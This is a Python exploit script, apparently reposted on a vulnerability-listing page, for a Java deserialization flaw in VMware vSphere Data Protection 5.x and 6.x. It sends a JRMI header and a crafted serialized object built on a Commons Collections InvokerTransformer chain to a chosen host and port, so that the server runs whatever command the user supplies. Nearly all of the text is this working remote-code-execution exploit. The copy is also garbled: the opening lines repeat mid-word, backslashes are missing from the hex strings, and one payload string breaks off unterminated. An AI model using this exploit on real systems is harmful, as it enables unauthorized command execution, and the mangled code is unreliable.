#!/usr/bin/env python
import socket
import sys
import ssl
def getHeader():
return 'x4ax52x4dx49x00x02x4b'
def payloa #!/usr/bin/env python
import socket
import sys
import ssl
def getHeader():
return 'x4ax52x4dx49x00x02x4b'
def payload():
cmd = sys.argv[4]
cmdlen = len(cmd)
data2 = 'x00x09x31x32x37x2ex30x2ex31x2ex31x00x00x00x00x50xacxedx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4dxc9xd4xe6x3bxdfx74x00x05x70x77x6ex65x64x73x7dx00x00x00x01x00x0fx6ax61x76x61x2ex72x6dx69x2ex52x65x6dx6fx74x65x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx70x78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x70x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x71x00x7ex00x00x73x71x00x7ex00x05x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x70x78x71x00x7ex00x02x73x71x00x7ex00x05x73x72x00x2ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex6dx61x70x2ex4cx61x7ax79x4dx61x70x6exe5x94x82x9ex79x10x94x03x00x01x4cx00x07x66x61x63x74x6fx72x79x74x00x2cx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x68x61x69x6ex65x64x54x72x61x6ex73x66x6fx72x6dx65x72x30xc7x97xecx28x7ax97x04x02x00x01x5bx00x0dx69x54x72x61x6ex73x66x6fx72x6dx65x72x73x74x00x2dx5bx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x75x72x00x2dx5bx4cx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex54x72x61x6ex73x66x6fx72x6dx65x72x3bxbdx56x2axf1xd8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3bx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x6fx6ex73x74x61x6ex74x54x72x61x6ex73x66x6fx72x6dx65x72x58x76x90x11x41x02xb1x94x02x00x01x4cx00x09x69x43x6fx6ex73x74x61x6ex74x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx70x78x70x76x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex52x75x6ex74x69x6dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex49x6ex76x6fx6bx65x72x54x72x61x6ex73x66x6fx72x6dx65x72x87xe8xffx6bx7bx7cxcex38x02x00x03x5bx00x05x69x41x72x67x73x74x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx69x4dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx
data2 += 'x00' + chr(cmdlen)
data2 += cmd
data2 += 'x74x00x04x65x78x65x63x75x71x00x7ex00x24x00x00x00x01x71x00x7ex00x29x73x71x00x7ex00x17x73x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75x65x70x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4ex75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00x70x78x70x00x00x00x01x73x71x00x7ex00x09x3fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6ax61x76x61x2ex6cx61x6ex67x2ex4fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7ex00x3fx78x71x00x7ex00x3f'
return data2
def sslMode():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")
def exploitTarget(sock):
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
print 'sending exploit headers
'
sock.send(getHeader())
sock.recv(8192)
print 'sending exploit
'
sock.send(payload())
sock.close()
print 'exploit completed.'
if __name__ == "__main__":
if len(sys.argv) != 5:
print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
sys.exit(0)
else:
sock = None
if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
sock = sslMode()
if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
exploitTarget(sock)
VMware vSphere Data Protection 5.x 6.x Java Deserialization
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 419